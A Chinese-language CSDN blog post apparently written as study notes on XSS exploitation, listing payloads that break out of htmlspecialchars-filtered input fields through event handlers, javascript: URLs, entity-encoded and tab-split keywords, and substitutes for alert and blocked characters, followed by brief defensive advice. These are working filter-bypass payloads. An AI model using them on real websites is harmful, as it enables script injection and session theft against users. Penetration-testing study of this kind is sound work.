xss 利用总结

最新推荐文章于 2023-05-22 21:03:31 发布
最新推荐文章于 2023-05-22 21:03:31 发布
阅读量901 收藏 4
点赞数
分类专栏: 基础漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45427650/article/details/104577336
版权

参考https://www.cnblogs.com/bmjoker/p/9446472.html

过滤函数:htmlspecialchars()   
& 转换为 &
" 转换为 "
' 转换为成为 '
< 转换为 &lt;
> 转换为 &gt;

原理:

下面这两个位置可以执行代码:因为上面有htmlspecialchars函数过滤,所以从input标签比较好下手
在这里插入图片描述
input标签是这样

<input name=keyword  value="'.$str.'">

1、用 onmouseover、onclick 就是这种的情况 需要在input标签内部

<input name=keyword  value="  "onmouseover=alert(1)> ">
<input name=keyword  value="  "onmouseover=alert(1)//">
或者:
payload :  " onclick=alert(1)>      这样需要点击一下输入框
           " onclick=alert(1)//   这样需要点击一下输入框

2、用这中 "><script>alert(1)</script> 也可以执行 需要在input外部

 <input name="keyword" value="  "><script>alert(1)</script> ">

3、还有一种姿势 οnfοcus=alert(1) autofocus=

<input name=keyword value=" " onfocus=alert(1) autofocus=" " >

Onfocus事件:定义的事件将在对象获得焦点时触发,这里指input标签获得焦点。
Autofocus属性:input标签的属性,当页面加载input标签,自动获得焦点。
焦点:这里指你的光标的位置,也就是说当你的光标出现在input文本框这里,将进行onfocus事件的发生。

如果script大小写被过滤

  • 则使用 <img src=1 οnerrοr=alert(1)>
    表示插入一个图片 图片路径错误无法显示 onerror事件 触发

  • 构造a标签,使其中的script进行HTML字符实体转换
    使用url编码也可以
    t 转换为 &#x74;
    则可以使用伪协议:javascrip&#x74;:alert(1)

    "><a href="javascrip&#x74;:alert(1)">haha</a>
如果是输出在a标签中则可直接使用 javascrip&#x74;:alert(1)

  • script中间插入制表符:
    在这里插入图片描述
    这里使用 &#x9

    "><a href="java&#x9script:alert(1)

Alert被过滤 可以使用confirm()、prompt()
例 :<script>confirm()</script>

利用javascript:伪协议
"><iframe src=javascript:alert(1)>
“><a href=“javascript:alert(1)”>haha</a> 或者:”><a href=“javascript:alert(1)”>haha

 <input name=keyword value=" "><a href="javascript:alert(1)">haha</a>">
 <input name=keyword value=" "><a href="javascript:alert(1)">haha">

如果()不能用 可以用  反引号

如果 空格被过滤可以使用 %0a 或 %0d 或/**/

如果是被 加了反斜杠 \ l过滤 双引号 这种过滤

  • 过滤 双引号:在alert中实体转换alert(&quot;XSS&quot;)
  • 使用JavaScript的fromCharCode函数绕过过滤:
    <IMGSRC=javascript:alert(String.fromCharCode(88,83,83))>
  • 使用没有双引号的:
    <IMG SRC=javascript:alert(‘XSS’)>

xss宽字节 绕过

在这里插入图片描述
在这里插入图片描述

某些情况下使用可以使用注释符绕过 长度限制

在这里插入图片描述
在这里插入图片描述

资料:
https://blog.csdn.net/suifengshiyu/article/details/22335239
https://blog.csdn.net/free_xiaochen/article/details/82289316

现在我们知道,这些标签都是闭合优先级高于双引号完整性优先级的特殊标签。

<!–
<iframe>
<noframes>
<no>
<>
<style>
<textarea>
<title>
<xmp>

其他

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
<img src=’ ’ οnlοad=alert(1)> 也可以给一个正确的路径 加载后弹窗

防护:
【不相应用户提交的数据,过滤过滤过滤!】
1、将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到 cookie了.
2、表单数据规定值的类型,例如:年龄应为只能为int、name只能为字母数字组合。。。。
4、对数据进行Html Encode 处理
5、过滤或移除特殊的Html标签, 例如:

心如熊猫
关注
专栏目录
xss漏洞原理及利用【万字详解】
2301_80064376的博客
08-03 1120
随着互联网技术的飞速发展,网络安全问题也日益凸显。在众多网络攻击方式中,跨站脚本攻击(Cross-Site Scripting, XSS)因其广泛性和高危性,成为了网络安全领域的一个重要研究课题。XSS 攻击通过在网页中注入恶意脚本,使攻击者能够窃取用户信息、劫持用户会话、篡改网页内容等,给用户和企业带来巨大的安全隐患。本文将深入探讨 XSS 漏洞的原理,并通过具体的实例演示如何复现这一漏洞,希望能帮助读者更好地理解和防范 XSS 攻击。
XSS过滤速查表
Fizz`s Blog
11-12 3109
初见于Freebuf,放在这里收藏一下。 就是OWASP的速查表 不过是中文的 1.介绍 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP
某次XSS绕过总结
Fly_鹏程万里
10-18 2896
0x01 背景 前段时间苏宁src五倍积分,想着无事刷一刷玩玩,碰到一个反射型XSS,如下图: 插入&lt;img src=a&gt;测试正常(此处截图遗失,漏洞已修补),证明存在XSS,但是过滤了许多关键词,很难执行代码,于是有了接下来的一波绕过。 0x02 测试过滤机制 经不断测试,发现存在如下过滤机制: 1、”&lt;script”,”alert(“,”prompt(“...
防止 常见几种网络攻击 【CSRF】【xss】【sql注入】
DuTianTian_csdn的博客
06-26 1014
xss  跨站脚本攻击XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击实施XSS攻击需要具备两个条件:一、需要向web页面注入恶意代码;二、这些恶意代码能够被浏览器成功的执行。解决方法::一、是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码二、 过滤用户输入的 检查用户输入的...
XSS下的绕过过滤方法
xjh101010的专栏
05-25 9566
http://www.2cto.com/article/200904/37539.html 很久没有写过文章了,今天写一篇小品文,仍然是关于XSS下的利用。 很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦就会转换成“<script src=1.js></scrip
XSS函数研究
shy的博客
03-12 1226
1,使用htmlspecialchars()函数将特殊字符转换为HTML实体 <?php $name=$_GET["name"]; $name=htmlspecialchars($name); ?> <input type='text' value='<?php echo $name?>'> 被转换的预定义的字符有: &:转换为&amp...
XSS命令大全
Abc_Kimball的博客
12-25 764
XSS命令大全: '> "> ='> %3Cscript%3Ealert(1)%3C/script%3E
XSS之冷门事件
不知名白帽的博客
06-29 710
XSS之冷门事件
跨站脚本攻击(XSS
知之为知之,不知为不知
10-07 1597
支持页面中的第三方资源引用和 CORS 也带来了很多安全问题,其中最典型的就是 XSS 攻击。 什么是 XSS 攻击 XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DOM 中注入恶意脚本,从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段。 最开始的时候,这种攻击是通过跨域来实现的,所以叫“跨域脚本”。但是发展到现在,往 HTML 文件中注入恶意代码的方式越来越多了
XSS闯关小游戏(level1~13)
qq_43381463的博客
02-04 468
XSS闯关小游戏(level1~13)
第十四节 IE中利用CSS触发XSS-01
最新发布
09-15
"IE中利用CSS触发XSS-01" 在IE浏览器中,CSS可以用来触发XSS攻击。本节课程将介绍如何使用CSS来触发XSS。 CSS介绍 CSS(Cascading Style Sheets)是一种用来表现HTML或XML文件样式的计算机语言。CSS不仅可以静态...
ctf xss利用_xss总结--2018自我整理
weixin_39851809的博客
01-14 1335
0x00前言因为ctf中xss的题目偏少(因为需要机器人在后台点选手的连接2333),所有写的比较少0x01xss作用常见的输出函数:print()、 print_r()、 echo、 printf()、 sprintf()、 die()、 var_dump()、 var_export()xss是往页面中添加了一段代码,并且被浏览器执行了反射型将恶意代码写入参数,或者自己服务器上搭个form表单传...
漫谈反射xss利用
Coisini的博客
06-09 1937
晚上无聊,没打草稿,想到哪,写到哪,凑合看吧. 先打个作者:Y35U 1,反射xss大吗? 反射xss相比flashxss和存储xss要多多了. so对于用户基数越大的网站,反射xss的威力就越大 因为多嘛,所以利用者会大增。 再者,存储的封的会快,而反射的封的相对不及时。 xss中,普遍认为存储的危害最大,那是要看你X谁了 如果你要x管理员,那肯定是存储的危害大 如果你要x更多的人(跟你同等身...
ctf xss利用_一道XSS题目分析
weixin_39960147的博客
01-14 1215
目录0x00 介绍题目地址:https://challenge.intigriti.io/题目的要求是绕过CSP实现XSS,执行alert(document.domain)。0x01 解决页面中加载了个script.js:varhash=document.location.hash.substr(1);if(hash){displayReason(hash);}document.getEle...
XSS利用方式
聚鼎安全
01-20 546
目录xss平台利用xss平台地址创建过程页面操作xss直接弹出cookieXSS总结 xss平台利用 xss平台地址 xss.fbisb.com 这个平台上有众多的xss代码 创建过程 点击的项目进行创建 ![[Pasted image 20210109141006.png]] 进入项目创建的构造框,我们进行项目的描述 ![[Pasted image 20210109141019.png]] 配置代码 勾选默认模块与keepsession ![[Pasted image 20210109141102.png
漫谈反射xss利用.txt
stilling2006的专栏
01-03 2153
晚上无聊,没打草稿,想到哪,写到哪,凑合看吧. 先打个作者:Y35U 1,反射xss大吗? 反射xss相比flashxss和存储xss要多多了. so对于用户基数越大的网站,反射xss的威力就越大 因为多嘛,所以利用者会大增。 再者,存储的封的会快,而反射的封的相对不及时。 xss中,普遍认为存储的危害最大,那是要看你X谁了 如果你要x管理员,那肯定是存储的危害大 如果你要x更多的人(跟你同等身
【转载】XSS靶机专项练习(总结
xhc6666的博客
05-22 600
XSS靶机测试专项练习总结
如何获取提交后的input标签中的值_利用XSS获取用户明文账户密码
weixin_39821330的博客
12-03 373
我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网...
跨域XSS总结:客户端与服务器端解决方案
针对同源策略的限制,演讲中提到了两种客户端解决方案:一种是利用IFrame,尽管IFrame可以加载不同源的内容,但仍然受到SOP的约束,不能直接与父页面交互;另一种是XMLHttpRequest,它通常用于异步请求,同样受限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值